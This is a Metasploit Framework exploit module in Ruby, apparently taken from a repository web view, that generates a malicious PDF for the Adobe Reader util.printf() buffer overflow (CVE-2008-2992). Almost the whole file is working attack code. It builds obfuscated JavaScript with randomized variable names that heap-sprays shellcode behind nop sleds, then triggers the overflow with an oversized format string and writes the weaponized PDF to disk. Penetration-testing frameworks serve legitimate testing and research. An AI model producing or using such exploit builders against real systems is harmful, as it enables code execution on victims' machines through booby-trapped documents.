Mario Ceballos
29c94ece40
git-svn-id: file:///home/svn/framework3/trunk@5999 4d416f70-5f16-0410-b530-b9f4589650da
165 lines
7.3 KiB
Ruby
165 lines
7.3 KiB
Ruby
###
|
|
## This file is part of the Metasploit Framework and may be subject to
|
|
## redistribution and commercial restrictions. Please see the Metasploit
|
|
## Framework web site for more information on licensing and terms of use.
|
|
## http://metasploit.com/projects/Framework/
|
|
###
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Adobe util.printf() Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional
|
|
< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
|
|
entry, an attacker may be able to execute arbitrary code.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'MC' ],
|
|
'Version' => '$Revision:$',
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2008-2992' ],
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'process',
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 1024,
|
|
'BadChars' => "\x00",
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
[ 'Adobe Reader v8.1.2 (Windows XP SP3 English)', { 'Ret' => '' } ],
|
|
],
|
|
'DisclosureDate' => 'Feb 8 2008',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
|
|
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
|
], self.class)
|
|
|
|
end
|
|
|
|
def exploit
|
|
# Encode the shellcode.
|
|
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
|
|
|
# Make some nops
|
|
nops = Rex::Text.to_unescape(make_nops(4))
|
|
|
|
# Randomize PDF version?
|
|
ver = 1 + rand(2)
|
|
|
|
build = 1 + rand(5)
|
|
|
|
x = ver.to_s + "." + build.to_s
|
|
|
|
# Randomize variables
|
|
rand1 = rand_text_alpha(rand(100) + 1)
|
|
rand2 = rand_text_alpha(rand(100) + 1)
|
|
rand3 = rand_text_alpha(rand(100) + 1)
|
|
rand4 = rand_text_alpha(rand(100) + 1)
|
|
rand5 = rand_text_alpha(rand(100) + 1)
|
|
rand6 = rand_text_alpha(rand(100) + 1)
|
|
rand7 = rand_text_alpha(rand(100) + 1)
|
|
rand8 = rand_text_alpha(rand(100) + 1)
|
|
rand9 = rand_text_alpha(rand(100) + 1)
|
|
rand10 = rand_text_alpha(rand(100) + 1)
|
|
rand11 = rand_text_alpha(rand(100) + 1)
|
|
|
|
script = %Q|
|
|
var #{rand1} = unescape("#{shellcode}");
|
|
var #{rand2} ="";
|
|
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
|
|
#{rand4} = #{rand2} + #{rand1};
|
|
#{rand5} = unescape("#{nops}");
|
|
#{rand6} = 20;
|
|
#{rand7} = #{rand6}+#{rand4}.length
|
|
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
|
|
#{rand8} = #{rand5}.substring(0, #{rand7});
|
|
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
|
|
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
|
|
#{rand10} = new Array();
|
|
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
|
|
util.printf("%45000.45000f", 0);
|
|
|
|
|
|
|
# Create the pdf
|
|
pdf = "\x25\x50\x44\x46\x2d" + x + "\x0a\x0a\x31\x20\x30\x20\x6f\x62"
|
|
pdf << "\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x43\x61\x74"
|
|
pdf << "\x61\x6c\x6f\x67\x0a\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20"
|
|
pdf << "\x32\x20\x30\x20\x52\x0a\x20\x2f\x50\x61\x67\x65\x73\x20\x33\x20"
|
|
pdf << "\x30\x20\x52\x0a\x20\x2f\x4f\x70\x65\x6e\x41\x63\x74\x69\x6f\x6e"
|
|
pdf << "\x20\x37\x20\x30\x20\x52\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a"
|
|
pdf << "\x0a\x0a\x32\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54"
|
|
pdf << "\x79\x70\x65\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x0a\x20\x2f"
|
|
pdf << "\x43\x6f\x75\x6e\x74\x20\x30\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62"
|
|
pdf << "\x6a\x0a\x0a\x33\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f"
|
|
pdf << "\x54\x79\x70\x65\x20\x2f\x50\x61\x67\x65\x73\x0a\x20\x2f\x4b\x69"
|
|
pdf << "\x64\x73\x20\x5b\x34\x20\x30\x20\x52\x5d\x0a\x20\x2f\x43\x6f\x75"
|
|
pdf << "\x6e\x74\x20\x31\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
|
|
pdf << "\x34\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70"
|
|
pdf << "\x65\x20\x2f\x50\x61\x67\x65\x0a\x20\x2f\x50\x61\x72\x65\x6e\x74"
|
|
pdf << "\x20\x33\x20\x30\x20\x52\x0a\x20\x2f\x4d\x65\x64\x69\x61\x42\x6f"
|
|
pdf << "\x78\x20\x5b\x30\x20\x30\x20\x36\x31\x32\x20\x37\x39\x32\x5d\x0a"
|
|
pdf << "\x20\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20\x35\x20\x30\x20\x52"
|
|
pdf << "\x0a\x20\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x20\x3c\x3c\x0a"
|
|
pdf << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x50\x72"
|
|
pdf << "\x6f\x63\x53\x65\x74\x20\x5b\x2f\x50\x44\x46\x20\x2f\x54\x65\x78"
|
|
pdf << "\x74\x5d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
|
|
pdf << "\x2f\x46\x6f\x6e\x74\x20\x3c\x3c\x20\x2f\x46\x31\x20\x36\x20\x30"
|
|
pdf << "\x20\x52\x20\x3e\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
|
|
pdf << "\x20\x20\x3e\x3e\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
|
|
pdf << "\x35\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x20\x2f\x4c\x65\x6e\x67"
|
|
pdf << "\x74\x68\x20\x35\x36\x20\x3e\x3e\x0a\x73\x74\x72\x65\x61\x6d\x0a"
|
|
pdf << "\x42\x54\x20\x2f\x46\x31\x20\x31\x32\x20\x54\x66\x20\x31\x30\x30"
|
|
pdf << "\x20\x37\x30\x30\x20\x54\x64\x20\x31\x35\x20\x54\x4c\x20\x28"
|
|
pdf << "\x65"
|
|
pdf << "\x61\x6d\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x36\x20\x30\x20\x6f"
|
|
pdf << "\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x46\x6f"
|
|
pdf << "\x6e\x74\x0a\x20\x2f\x53\x75\x62\x74\x79\x70\x65\x20\x2f\x54\x79"
|
|
pdf << "\x70\x65\x31\x0a\x20\x2f\x4e\x61\x6d\x65\x20\x2f\x46\x31\x0a\x20"
|
|
pdf << "\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x20\x2f\x48\x65\x6c\x76\x65"
|
|
pdf << "\x74\x69\x63\x61\x0a\x20\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20"
|
|
pdf << "\x2f\x4d\x61\x63\x52\x6f\x6d\x61\x6e\x45\x6e\x63\x6f\x64\x69\x6e"
|
|
pdf << "\x67\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x37\x20\x30"
|
|
pdf << "\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f"
|
|
pdf << "\x41\x63\x74\x69\x6f\x6e\x0a\x20\x2f\x53\x20\x2f\x4a\x61\x76\x61"
|
|
pdf << "\x53\x63\x72\x69\x70\x74\x0a\x20\x2f\x4a\x53\x20\x28"
|
|
pdf << script
|
|
pdf << "\x0a\x0a\x0a"
|
|
pdf << "\x29\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x78\x72\x65"
|
|
pdf << "\x66\x0a\x30\x20\x38\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
|
|
pdf << "\x20\x36\x35\x35\x33\x35\x20\x66\x0a\x30\x30\x30\x30\x30\x30\x30"
|
|
pdf << "\x30\x31\x30\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30"
|
|
pdf << "\x30\x30\x30\x30\x39\x38\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30"
|
|
pdf << "\x30\x30\x30\x30\x30\x30\x31\x34\x37\x20\x30\x30\x30\x30\x30\x20"
|
|
pdf << "\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x32\x30\x38\x20\x30\x30\x30"
|
|
pdf << "\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x34\x30\x30\x20"
|
|
pdf << "\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x35"
|
|
pdf << "\x30\x37\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30"
|
|
pdf << "\x30\x30\x36\x32\x31\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x74\x72"
|
|
pdf << "\x61\x69\x6c\x65\x72\x0a\x3c\x3c\x0a\x20\x2f\x53\x69\x7a\x65\x20"
|
|
pdf << "\x38\x0a\x20\x2f\x52\x6f\x6f\x74\x20\x31\x20\x30\x20\x52\x0a\x3e"
|
|
xrefPosition = pdf.length
|
|
pdf << "\x3e\x0a\x73\x74\x61\x72\x74\x78\x72\x65\x66\x0a" + xrefPosition.to_s()
|
|
pdf << "\x0a\x25\x25\x45\x4f\x46\x0a"
|
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file...")
|
|
|
|
file_create(pdf)
|
|
end
|
|
|
|
end
|